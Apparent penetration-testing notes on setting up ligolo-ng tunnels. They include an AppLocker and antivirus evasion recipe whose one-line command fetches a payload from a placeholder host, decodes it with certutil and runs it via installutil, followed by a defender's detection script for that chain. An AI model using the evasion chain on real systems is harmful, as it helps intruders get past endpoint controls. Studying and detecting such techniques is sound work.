# ligolo-ng

<p class="callout warning">You can use the standard apt repos if you don't need to make any modifications, e.g. for bypassing AppLocker or CLM.</p>

```bash
sudo apt install ligolo-ng ligolo-ng-common-binaries -y
```

# Basic tunnel

1. Start `ligolo-proxy`

    ```bash
    sudo ligolo-proxy -selfcert
    ```
2. Connect the agent
3. Enter the session and list the network configuration

    ```powershell
    # in ligolo-ng
    sessions
    ifconfig
    ```
4. Set the route

    1. 1 hop

        ```powershell
        autoroute
        start
        ```
    2. 2 hops

## AV evasion

1. Clone the repository
    
    ```powershell
    git clone https://github.com/nicocha30/ligolo-ng.git
    ```
2. Edit the `ignoreCertificate` and `serverAddr` variables in the following file `/ligolo-ng/cmd/agent/main.go`
3. Compile the `agent.exe` using the following command
    
    ```bash
    GOOS=windows go build -o agent.exe cmd/agent/main.go
    ```
4. Compile as `x64` and name the output `ApplockerBypassExternalBinary.exe` ([GitHub repo](https://github.com/blu3drag0nsec/osepvs/tree/main/tools/06.applocker/ApplockerBypassExternalBinary))
5. Encode the file created above with certutil
    
    ```powershell
    certutil.exe -encode .\ApplockerBypassExternalBinary.exe AppLockerBypassLigolo.txt
    ```
6. Rename the `agent.exe` to `ligolo-agent.exe`
7. Serve the files (`ligolo-agent.exe` and `AppLockerBypassLigolo.txt`)
8. Upload the files to the target
    
    ```powershell
    cmd.exe /c curl http://YOUR_IP/ligolo-agent.exe -o C:\users\public\try-agent.exe && curl http://YOUR_IP/AppLockerBypassLigolo.txt -o C:\users\public\enc.txt && certutil -decode C:\users\public\enc.txt C:\users\public\ligolo.exe && del C:\users\public\enc.txt && C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=true /U C:\users\public\ligolo.exe
    ```
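From the defender's side, the `certutil -decode` and `installutil /U` chain in the last step leaves a recognisable sequence in process-creation logs. The following is an added example, not part of the original notes or the ligolo-ng project: it correlates the two commands per host over constructed sample records, and the `host` and `cmdline` field names are assumptions about the log schema.

```python
import re
from collections import defaultdict

# Constructed process-creation records; "host" and "cmdline" are assumed field names.
SAMPLE_EVENTS = [
    {"host": "WS01", "cmdline": r"certutil -decode C:\users\public\enc.txt C:\users\public\ligolo.exe"},
    {"host": "WS01", "cmdline": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe"
                                r" /logfile= /LogToConsole=true /U C:\users\public\ligolo.exe"},
    {"host": "WS02", "cmdline": r"certutil -verify C:\certs\corp-ca.cer"},
    {"host": "WS03", "cmdline": r'installutil.exe "C:\Program Files\Vendor\Service.exe"'},
]

# Directories a standard user can usually write to (not exhaustive).
USER_WRITABLE = re.compile(r"\\(users|programdata|windows\\temp)\\", re.I)
# Groups: 2 = encoded input file, 3 = decoded output file.
CERTUTIL_DECODE = re.compile(r'certutil(\.exe)?"?\s+.*[-/]decode\s+(\S+)\s+(\S+)', re.I)
# Group 2 = assembly passed to the uninstall switch (paths without spaces only).
INSTALLUTIL_U = re.compile(r'installutil(\.exe)?"?\s+.*[-/]u\s+"?(\S+?)"?\s*$', re.I)

def detect(events):
    """Return (host, severity, reason) tuples; events must be in time order."""
    decoded = defaultdict(set)  # host -> files written by certutil -decode
    alerts = []
    for ev in events:
        host, cmd = ev["host"], ev["cmdline"]
        m = CERTUTIL_DECODE.search(cmd)
        if m:
            out = m.group(3).strip('"').lower()
            decoded[host].add(out)
            if USER_WRITABLE.search(out):
                alerts.append((host, "medium", "certutil -decode into user-writable path"))
            continue
        m = INSTALLUTIL_U.search(cmd)
        if m:
            target = m.group(2).lower()
            if target in decoded[host]:
                # Same file was decoded earlier on this host: strongest signal.
                alerts.append((host, "high", "installutil /U on certutil-decoded file"))
            elif USER_WRITABLE.search(target):
                alerts.append((host, "medium", "installutil /U from user-writable path"))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

In production the same correlation would normally be bounded by a time window and keyed on the parent process as well as the host.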